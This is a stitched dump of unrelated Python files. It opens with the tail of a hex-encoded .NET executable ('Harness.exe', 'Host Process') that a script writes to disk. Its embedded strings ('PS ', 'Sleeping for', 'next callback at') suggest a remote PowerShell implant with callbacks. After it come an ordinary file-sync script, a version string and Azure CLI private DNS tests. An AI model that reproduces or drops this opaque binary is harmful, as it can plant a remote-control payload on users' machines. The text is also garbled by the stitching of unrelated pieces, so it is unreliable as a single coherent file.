7300610062006c0065002d0066006f0072006d0061007400010b73006c0065006500700000295b002b005d00200046006f0072006d0061007400740069006e006700200061006400640065006400002d5b002d005d00200046006f0072006d0061007400740069006e0067002000720065006d006f00760065006400011355004e0044004500460049004e00450044000003200000235b002b005d00200053006c0065006500700069006e006700200066006f007200200000272c0020006e006500780074002000630061006c006c006200610063006b00200061007400200000395b002d005d00200049006e00760061006c0069006400200073006c00650065007000200070006100720061006d006500740065007200200001050d000a0000154f00750074002d0053007400720069006e006700010750005300200000053e002000000f4800610072006e00650073007300004f45006e007400650072004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0020002000004b45007800690074004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00200000030a00000f440045004200550047003a002000000f4500520052004f0052003a002000001356004500520042004f00530045003a00200000135700410052004e0049004e0047003a00200000155b007b0030007d005d0020007b0031007d00200000212800440065006600610075006c00740020006900730020007b0030007d002900002149006e00760061006c00690064002000630068006f006900630065003a00200000176e0075006c006c005f0064006f006d00610069006e0000032f00005552006500610064004c0069006e0065004100730053006500630075007200650053007400720069006e00670020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004946006c0075007300680049006e0070007500740042007500660066006500720020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004b47006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0000414b006500790041007600610069006c00610062006c00650020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00003752006500610064004b006500790020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004f5300630072006f006c006c0042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e00740065006400004b53006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004953006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640000032e000000000025a612ba22a93742a30a8457e70447430008b77a5c561934e0890831bf3856ad364e350206020306121c0306121902060803061d050306120c0306121d030612210306122503200001032000020420010102032000080420010108050001011d0e0420001219042001020e042001010e062002011c12290328000203280008030612080306112d03061210052001011208042000112d0320000e0420001231042000120d0420001235042800112d0328000e0428001231042800120d04280012350306121808200301113911390e062002010a123d112003151241020e12450e0e15124901124d0c2004080e0e151249011251080500011d0e0e0f0001140e02000200001512490112510400010118120009020818091255100812551008125510081200090810111408100918091018100910020809000502080e0e18100808200412590e0e0e0e0c200612590e0e0e0e115d116104200012150420001265042800121502061802060e030611690306116d0306113904200011390520010111390420001169052001011169042000116d05200101116d0c2001141171020002000011750620011179117d0b2004011175116d1175117107200201117511710d200201116d141171020002000004280011390428001169042800116d0406128081040612808508200301120
81219020d2004021c12808912808d1180910520010e1d05072003081d050808072003011d0508080401000000090002011280dd1180e10400001225062001011280e5080002121d12091225062001011180ed040000122105200101121d0407011d05030701020307010804000101080507021208020500001280f50720030e1d0508080500020e1c1c050002020e0e0500020e0e0e0500011d050e040001020e04200103080e070b030e0e0e02021d050e0e0802052001011d0507200201128105080c0704121912810512810d12190f0705128105128111121912810d121907151249011281151200021512490112811d0e1015124901128115120704151249011281151512490112811d02020520020e08080520010e1d030620011d0e1d03050000118121060002020e100d0620011181210d0600030e0e0e0e080002020e101181210b00021181291181211181210320000d0600011181290d0820011181291181290700040e0e0e0e0e2407140e021d0e1181211181211181291181210e0d0d0d0d1181290d021d030e020311812105200112210e071512812d0112450715128131011229052002011c180a200101151281310112290520001281350a20001512812d01128139081512812d011281391430020212813d1512812d011e001512812d011e01060a0212451245042000121d05200012814105200012814505200012814905200012814d0e07041512812d01124512813d0e020820001512490113000615124901124509200015128151011300071512815101124504200013001907051512812d01124515124901124512451512815101124502071512490112813908151281510112813915070415124901128139128139151281510112813902040000112d040701112d0307010e0520020108080407011231040701120d0500001280f104070112350520011d050e0507021d050207151241020e12450615124901124d071512815101124d05000112451c07200201130013011d0707151241020e1245124d1d0e0e151241020e12451512815101124d0207140e02000200000600030e0e1c1c05200112550e061512490112510500020e0e1c100707140e02000200001255080e0808020e07071d0e1d0e1d0e1d0e1d0302030520011300080620030108080e140705140e0200020000081d0e140e020002000002040001081c0420001d030420010103061512816d01030e100102011d1e001512816d011e00030a0103062002010e12651a07111114091809020e126512590812551255125508080812590204070112590407011215080705081d050e0e020620010111817504070111390407011169040701116d0e07061169116d116911691169116d0520001280810d20040112817d021281791281810607040e080e02040702020204070208021101000c486f73742050726f63657373000005010000000017010012436f7079726967687420c2a920203230313500002901002466353961636637662d306632362d343761312d386434322d61633266363130343234326200000c010007312e302e302e3000000801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301000000c06a00000000000000000000de6a0000002000000000000000000000000000000000000000000000d06a000000000000000000000000000000005f436f724578654d61696e006d73636f7265652e646c6c0000000000ff250020400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000588000007c02000000000000000000007c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000001000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e0000
0000000000b004dc010000010053007400720069006e006700460069006c00650049006e0066006f000000b8010000010030003000300030003000340062003000000044000d000100460069006c0065004400650073006300720069007000740069006f006e000000000048006f00730074002000500072006f00630065007300730000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000038000c00010049006e007400650072006e0061006c004e0061006d00650000004800610072006e006500730073002e0065007800650000004800120001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a900200020003200300031003500000040000c0001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000004800610072006e006500730073002e006500780065000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000c000000f03a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
with open(input("Save as: "), "wb") as f:
f.write(bytearray.fromhex(raw_code))
|
py | 7dfaad3a0930ffb4d8d93ac7fc8c749cd7442f90 | # auto file synchronization
import os
import hashlib
import json
# walk path, recording every directory (as a path relative to root) and the MD5 of every file
def creatFileMD5Dict(root,path,listPathDir,dictFileMD5):
for name in os.listdir(path):
if name=="$RECYCLE.BIN" or name=="System Volume Information":
continue
childPath = path+os.sep+name
if os.path.isdir(childPath):
listPathDir.append(childPath[len(root):])
creatFileMD5Dict(root,childPath,listPathDir,dictFileMD5)
else:
with open(childPath,'rb') as file:
md5 = hashlib.md5(file.read()).hexdigest()
                if childPath[len(root):] not in dictFileMD5:
                    dictFileMD5[childPath[len(root):]] = md5
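# Hypothetical usage sketch (the directory and file names are made up): after
#     dirs, md5s = [], {}
#     creatFileMD5Dict('F:\\source', 'F:\\source', dirs, md5s)
# dirs holds entries such as '\\docs' and md5s maps keys such as '\\docs\\a.txt'
# to the hex MD5 digest of that file; both are relative to the root argument,
# which is why syncDir/syncFile can rebuild absolute paths with pathSource+sDir.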
# recursively delete everything inside path (files and subdirectories); the caller removes path itself
def removeDir(path):
for name in os.listdir(path):
childPath = path+os.sep+name
if os.path.isdir(childPath):
removeDir(childPath)
os.rmdir(childPath)
print('[del-dir] : ',childPath)
else:
os.remove(childPath)
print('[del-fil] : ',childPath)
# copy fileSource to fileTarget
def copyFile(fileSource,fileTarget):
with open(fileSource,'rb') as fs:
with open(fileTarget,'wb') as ft:
ft.write(fs.read())
print('[add-fil] : ',fileTarget)
# synchronize directories: delete source dirs missing from target, create dirs that exist only in target
def syncDir(pathSource,pathTarget,listSourceDir,listTargetDir):
for sDir in listSourceDir:
if sDir not in listTargetDir:
if os.path.isdir(pathSource+sDir):
removeDir(pathSource+sDir)
os.rmdir(pathSource+sDir)
print('[del-dir] : ',pathSource+sDir)
for tDir in listTargetDir:
if tDir not in listSourceDir:
os.mkdir(pathSource+tDir)
print('[add-dir] : ',pathSource+tDir)
# synchronize files: delete source files missing from target, copy new or changed files from target
def syncFile(pathSource,pathTarget,dictSourceFileMD5,dictTargetFileMD5):
for sFile in dictSourceFileMD5:
if sFile not in dictTargetFileMD5:
if os.path.isfile(pathSource+sFile):
os.remove(pathSource+sFile)
print('[del-fil] : ',pathSource+sFile)
for tFile in dictTargetFileMD5:
if tFile in dictSourceFileMD5:
if dictSourceFileMD5[tFile] != dictTargetFileMD5[tFile]:
if os.path.isfile(pathSource+tFile):
os.remove(pathSource+tFile)
print('[del-fil] : ',pathSource+tFile)
copyFile(pathTarget+tFile,pathSource+tFile)
else:
copyFile(pathTarget+tFile,pathSource+tFile)
# read json file
def readJson():
jsonPath = os.getcwd()+os.sep+'path.json'
# print(jsonPath)
if os.path.isfile(jsonPath):
with open(jsonPath,'r') as f:
pathJson = json.load(f)
pathData = pathJson['path']
# print(pathData)
            return pathData
    # guard against a missing path.json so the caller gets an empty list instead of None
    print('[error] : path.json not found!')
    return []
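# A minimal sketch of the path.json layout readJson() expects, inferred from the keys used
# above ('path', 'source', 'target'); the concrete paths below are only illustrative examples:
# {
#     "path": [
#         {"source": "F:\\source", "target": "//192.168.0.101/target"}
#     ]
# }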
# main entry point: synchronize every source/target pair listed in path.json
def autoFileSync():
print('******************************** AUTO FILE SYNCHRONIZATION ********************************')
print('FUNCTION: SYNCHRONIZE TARGET PATH TO SOURCE PATH.')
# path_source = input('Please input your source path(F:\\\\source): ')
# path_target = input('Please input your target path(//192.168.0.101/target): ')
pathData = readJson()
    for path in pathData:
        # reset the per-pair state so multiple entries in path.json do not pollute each other
        listSourceDir = []      # source dirs, relative to path_source
        listTargetDir = []      # target dirs, relative to path_target
        dictSourceFileMD5 = {}  # source file path (relative to path_source) -> file md5
        dictTargetFileMD5 = {}  # target file path (relative to path_target) -> file md5
path_source = path['source']
path_target = path['target']
print("Source Directory: ", path_source)
print("Target Directory: ", path_target)
if os.path.isdir(path_source):
if os.path.isdir(path_target):
creatFileMD5Dict(path_source,path_source,listSourceDir,dictSourceFileMD5)
print('Source Directory Count: ',len(listSourceDir))
print('Source File Count: ',len(dictSourceFileMD5))
creatFileMD5Dict(path_target,path_target,listTargetDir,dictTargetFileMD5)
print('Target Directory Count: ',len(listTargetDir))
print('Target File Count: ',len(dictTargetFileMD5))
syncDir(path_source,path_target,listSourceDir,listTargetDir)
syncFile(path_source,path_target,dictSourceFileMD5,dictTargetFileMD5)
else:
print('[error] : target path error!')
else:
print('[error] : source path error!')
print('******************************** AUTO FILE SYNCHRONIZATION ********************************')
autoFileSync()
input() |
py | 7dfaad7c859242c75261af5d0094b61225d7aa30 | # same version as in:
# - setup.py
# - stdeb.cfg
__version__ = '0.20.0'
|
py | 7dfaad93ae30e7b2e93690bd4a90dca9a7a392d8 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
import os
import unittest
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
from ._test_data_generator import (GeneratePrivateZoneName,
GenerateVirtualNetworkName,
GenerateVirtualNetworkLinkName,
GenerateRecordSetName,
GeneratePrivateZoneArmId,
GenerateVirtualNetworkLinkArmId,
GenerateVirtualNetworkArmId,
GenerateRecordSetArmId,
GenerateTags)
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
logger = get_logger(__name__)
class BaseScenarioTests(ScenarioTest):
def _Validate_Zones(self, expectedZones, actualZones):
result = all(zone in actualZones for zone in expectedZones)
        self.assertTrue(result)
def _Create_PrivateZones(self, numOfZones=2):
createdZones = list()
for num in range(numOfZones):
createdZones.append(self._Create_PrivateZone())
createdZones.sort(key=lambda x: x['name'])
return createdZones
def _Create_PrivateZone(self):
GeneratePrivateZoneName(self)
return self.cmd('az network private-dns zone create -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check_pattern('id', GeneratePrivateZoneArmId(self)),
self.check('location', 'global'),
self.check('type', 'Microsoft.Network/privateDnsZones'),
self.exists('etag'),
self.check('tags', None),
self.check('provisioningState', 'Succeeded'),
self.greater_than('maxNumberOfRecordSets', 0),
self.greater_than('maxNumberOfVirtualNetworkLinks', 0),
self.greater_than('maxNumberOfVirtualNetworkLinksWithRegistration', 0),
self.check('numberOfRecordSets', 1),
self.check('numberOfVirtualNetworkLinks', 0),
self.check('numberOfVirtualNetworkLinksWithRegistration', 0),
]).get_output_in_json()
def _Create_VirtualNetwork(self):
GenerateVirtualNetworkName(self)
return self.cmd('az network vnet create -g {rg} -n {vnet}', checks=[
self.check('newVNet.name', '{vnet}'),
self.check_pattern('newVNet.id', GenerateVirtualNetworkArmId(self))
]).get_output_in_json()
def _Validate_Links(self, expectedLinks, actualLinks):
result = all(link in actualLinks for link in expectedLinks)
        self.assertTrue(result)
def _Create_VirtualNetworkLinks(self, numOfLinks=2):
self._Create_PrivateZone()
createdLinks = list()
for num in range(numOfLinks):
createdLinks.append(
self._Create_VirtualNetworkLink(createZone=False))
createdLinks.sort(key=lambda x: x['name'])
return createdLinks
def _Create_VirtualNetworkLink(self, registrationEnabled=False, createZone=True):
self.kwargs['registrationEnabled'] = registrationEnabled
if createZone is True:
self._Create_PrivateZone()
self._Create_VirtualNetwork()
GenerateVirtualNetworkLinkName(self)
return self.cmd('az network private-dns link vnet create -g {rg} -n {link} -z {zone} -v {vnet} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check_pattern('id', GenerateVirtualNetworkLinkArmId(self)),
self.check('location', 'global'),
self.check('type', 'Microsoft.Network/privateDnsZones/virtualNetworkLinks'),
self.exists('etag'),
self.check('tags', None),
self.check_pattern('virtualNetwork.id', GenerateVirtualNetworkArmId(self)),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded'),
self.check_pattern('virtualNetworkLinkState', 'InProgress|Completed')
]).get_output_in_json()
def _RecordType_To_FunctionName(self, key, operation):
type_dict = {
'a': {'Create': '_Create_ARecord', 'Delete': '_Delete_ARecord'},
'aaaa': {'Create': '_Create_AAAARecord', 'Delete': '_Delete_AAAARecord'},
'cname': {'Create': '_Create_CNAMERecord', 'Delete': '_Delete_CNAMERecord'},
'mx': {'Create': '_Create_MXRecord', 'Delete': '_Delete_MXRecord'},
'ptr': {'Create': '_Create_PTRRecord', 'Delete': '_Delete_PTRRecord'},
'srv': {'Create': '_Create_SRVRecord', 'Delete': '_Delete_SRVRecord'},
'txt': {'Create': '_Create_TXTRecord', 'Delete': '_Delete_TXTRecord'},
}
return type_dict[key.lower()][operation]
def _Create_RecordSet(self, recordType, zoneName):
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
GenerateRecordSetName(self)
self.cmd('az network private-dns record-set {recordType} create -g {rg} -n {recordset} -z {zone}', checks=[
self.check('name', '{recordset}'),
self.check_pattern('id', GenerateRecordSetArmId(self)),
self.check_pattern('type', 'Microsoft.Network/privateDnsZones/{recordType}'),
self.exists('etag'),
self.check('fqdn', '{recordset}.{zone}.'),
self.check('metadata', None),
self.check('isAutoRegistered', False),
self.check('ttl', 3600)
]).get_output_in_json()
return getattr(self, self._RecordType_To_FunctionName(recordType, 'Create'))(self.kwargs['recordset'], zoneName)
def _Create_ARecord(self, recordset, zone, arecord='10.0.0.1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['arecord'] = arecord
recordsetResult = self.cmd('az network private-dns record-set a add-record -g {rg} -n {recordset} -z {zone} -a {arecord}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(arecord in [o['ipv4Address'] for o in recordsetResult.get('aRecords')])
return recordsetResult
def _Create_AAAARecord(self, recordset, zone, aaaarecord='::1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['aaaarecord'] = aaaarecord
recordsetResult = self.cmd('az network private-dns record-set aaaa add-record -g {rg} -n {recordset} -z {zone} -a {aaaarecord}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(aaaarecord in [o['ipv6Address'] for o in recordsetResult.get('aaaaRecords')])
return recordsetResult
def _Create_MXRecord(self, recordset, zone, exchange='ex.chan.ge', preference=1):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['exchange'] = exchange
self.kwargs['preference'] = preference
recordsetResult = self.cmd('az network private-dns record-set mx add-record -g {rg} -n {recordset} -z {zone} -e {exchange} -p {preference}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(exchange in [o['exchange'] for o in recordsetResult.get('mxRecords')])
self.assertTrue(preference in [o['preference'] for o in recordsetResult.get('mxRecords')])
return recordsetResult
def _Create_PTRRecord(self, recordset, zone, ptrdname='ptrd.name'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['ptrdname'] = ptrdname
recordsetResult = self.cmd('az network private-dns record-set ptr add-record -g {rg} -n {recordset} -z {zone} -d {ptrdname}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(ptrdname in [o['ptrdname'] for o in recordsetResult.get('ptrRecords')])
return recordsetResult
def _Create_SRVRecord(self, recordset, zone, target='targ.et'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['port'] = 120
self.kwargs['priority'] = 1
self.kwargs['target'] = target
self.kwargs['weight'] = 5
recordsetResult = self.cmd('az network private-dns record-set srv add-record -g {rg} -n {recordset} -z {zone} -r {port} -p {priority} -t {target} -w {weight}', checks=[
self.check('name', '{recordset}'),
self.check('srvRecords[0].port', '{port}'),
self.check('srvRecords[0].priority', '{priority}'),
self.check('srvRecords[0].weight', '{weight}')
]).get_output_in_json()
self.assertTrue(target in [o['target'] for o in recordsetResult.get('srvRecords')])
return recordsetResult
def _Create_TXTRecord(self, recordset, zone, txtrecord='txt record'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['txtrecord'] = txtrecord
recordsetResult = self.cmd('az network private-dns record-set txt add-record -g {rg} -n {recordset} -z {zone} -v "{txtrecord}"', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(txtrecord in [o['value'][0] for o in recordsetResult.get('txtRecords')])
return recordsetResult
def _Create_CNAMERecord(self, recordset, zone, cname='clitestcname'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['cname'] = cname
recordsetResult = self.cmd('az network private-dns record-set cname set-record -g {rg} -n {recordset} -z {zone} -c {cname}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(cname == recordsetResult.get('cnameRecord').get('cname'))
return recordsetResult
def _Update_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
tagKey, tagVal = GenerateTags(self)
update_cmd = 'az network private-dns record-set {recordType} update -g {rg} -n {recordset} -z {zone} --metadata {tags}'
if etag is not None:
self.kwargs['etag'] = etag
update_cmd = update_cmd + " --if-match {etag}"
return self.cmd(update_cmd, checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
]).get_output_in_json()
def _Show_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
show_cmd = 'az network private-dns record-set {recordType} show -g {rg} -n {recordset} -z {zone}'
return self.cmd(show_cmd, checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
def _List_RecordSet(self, recordType, zoneName, etag=None):
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
list_cmd = 'az network private-dns record-set {recordType} list -g {rg} -z {zone}'
return self.cmd(list_cmd).get_output_in_json()
def _Delete_ARecord(self, recordset, zone, arecord='10.0.0.1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['arecord'] = arecord
recordsetResult = self.cmd('az network private-dns record-set a remove-record -g {rg} -n {recordset} -z {zone} -a {arecord} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(arecord not in [o['ipv4Address'] for o in recordsetResult.get('aRecords', [])])
return recordsetResult
def _Delete_AAAARecord(self, recordset, zone, aaaarecord='::1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['aaaarecord'] = aaaarecord
recordsetResult = self.cmd('az network private-dns record-set aaaa remove-record -g {rg} -n {recordset} -z {zone} -a {aaaarecord} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(aaaarecord not in [o['ipv6Address'] for o in recordsetResult.get('aaaaRecords', [])])
return recordsetResult
def _Delete_MXRecord(self, recordset, zone, exchange='ex.chan.ge', preference=1):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['exchange'] = exchange
self.kwargs['preference'] = preference
recordsetResult = self.cmd('az network private-dns record-set mx remove-record -g {rg} -n {recordset} -z {zone} -e {exchange} -p {preference} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(exchange not in [o['exchange'] for o in recordsetResult.get('mxRecords', [])])
self.assertTrue(preference not in [o['preference'] for o in recordsetResult.get('mxRecords', [])])
return recordsetResult
def _Delete_PTRRecord(self, recordset, zone, ptrdname='ptrd.name'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['ptrdname'] = ptrdname
recordsetResult = self.cmd('az network private-dns record-set ptr remove-record -g {rg} -n {recordset} -z {zone} -d {ptrdname} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(ptrdname not in [o['ptrdname'] for o in recordsetResult.get('ptrRecords', [])])
return recordsetResult
def _Delete_SRVRecord(self, recordset, zone, target='targ.et'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['port'] = 120
self.kwargs['priority'] = 1
self.kwargs['target'] = target
self.kwargs['weight'] = 5
recordsetResult = self.cmd('az network private-dns record-set srv remove-record -g {rg} -n {recordset} -z {zone} -r {port} -p {priority} -t {target} -w {weight} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(target not in [o['target'] for o in recordsetResult.get('srvRecords', [])])
return recordsetResult
def _Delete_TXTRecord(self, recordset, zone, txtrecord='txt record'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['txtrecord'] = txtrecord
recordsetResult = self.cmd('az network private-dns record-set txt remove-record -g {rg} -n {recordset} -z {zone} -v "{txtrecord}" --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(txtrecord not in [o['value'][0] for o in recordsetResult.get('txtRecords', [])])
return recordsetResult
def _Delete_CNAMERecord(self, recordset, zone, cname='clitestcname'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['cname'] = cname
recordsetResult = self.cmd('az network private-dns record-set cname remove-record -g {rg} -n {recordset} -z {zone} -c {cname} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(cname != recordsetResult.get('cnameRecord', {}).get('cname', ''))
return recordsetResult
def _Delete_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
getattr(self, self._RecordType_To_FunctionName(recordType, 'Delete'))(recordset, zoneName)
self.cmd('az network private-dns record-set {recordType} delete -g {rg} -n {recordset} -z {zone} -y')
class PrivateDnsZonesTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneNotExists_ExpectZoneCreated(self, resource_group):
self._Create_PrivateZone()
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneNotExistsWithTags_ExpectZoneCreatedWithTags(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneExistsIfNoneMatchFailure_ExpectError(self, resource_group):
self._Create_PrivateZone()
with self.assertRaisesRegexp(CLIError, 'exists already'):
self.cmd('az network private-dns zone create -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsIfMatchSuccess_ExpectZoneUpdated(self, resource_group):
zoneCreated = self._Create_PrivateZone()
self.kwargs['etag'] = zoneCreated['etag']
self.cmd('az network private-dns zone update -g {rg} -n {zone} --if-match {etag}', checks=[
self.check('name', '{zone}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsIfMatchFailure_ExpectError(self, resource_group):
self._Create_PrivateZone()
self.kwargs['etag'] = self.create_guid()
with self.assertRaisesRegexp(CloudError, 'etag mismatch'):
self.cmd('az network private-dns zone update -g {rg} -n {zone} --if-match {etag}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsAddTags_ExpectTagsAdded(self, resource_group):
self._Create_PrivateZone()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsChangeTags_ExpectTagsChanged(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsRemoveTags_ExpectTagsRemoved(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags ""', checks=[
self.check('name', '{zone}'),
self.check('tags', '{{}}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns zone update -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsEmptyRequest_ExpectNoError(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone update -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetZone_ZoneExists_ExpectZoneRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone show -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check_pattern('id', GeneratePrivateZoneArmId(self)),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetZone_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns zone show -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
